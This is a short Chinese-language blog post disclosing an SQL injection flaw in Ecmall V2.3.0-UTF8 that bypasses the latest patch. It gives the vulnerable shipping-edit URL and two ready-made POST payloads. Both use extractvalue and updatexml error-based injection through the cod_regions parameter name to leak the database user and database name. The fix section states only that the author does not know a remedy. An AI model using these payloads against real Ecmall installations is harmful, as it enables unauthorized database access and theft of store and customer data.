打了最新的补丁

绕过方法:

updatexml函数

extractvalue函数

url:
 

http://localhost/ecmall/index.php?app=my_shipping&act=edit&shipping_id=1

payload1:
 

shipping_name=li&shipping_desc=asd&irst_price=10&step_price=0&enabled=1&sort_order=255&cod_regions[1' or extractvalue(1,concat(0x5c,(select user())))#]=v

效果:
 

Ecmall V2.3.0-UTF8 正式版SQL注入漏洞(绕过过滤) – 网插图

payload2:
 

shipping_name=li&shipping_desc=asd&irst_price=10&step_price=0&enabled=1&sort_order=255&cod_regions[1' or updatexml(2,concat(0x7e,(database())),0)#]=v

效果:
 

Ecmall V2.3.0-UTF8 正式版SQL注入漏洞(绕过过滤) – 网插图1

 

修复方案:

我不知道

    上一篇: 天格科技某处越权漏洞可修改任意账户资料 - 网

    下一篇: 置信经典OriTop管理系统sql注入以及任意文件下载
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《Ecmall V2.3.0-UTF8 正式版SQL注入漏洞(绕过过滤) – 网
   

还没有人抢沙发呢~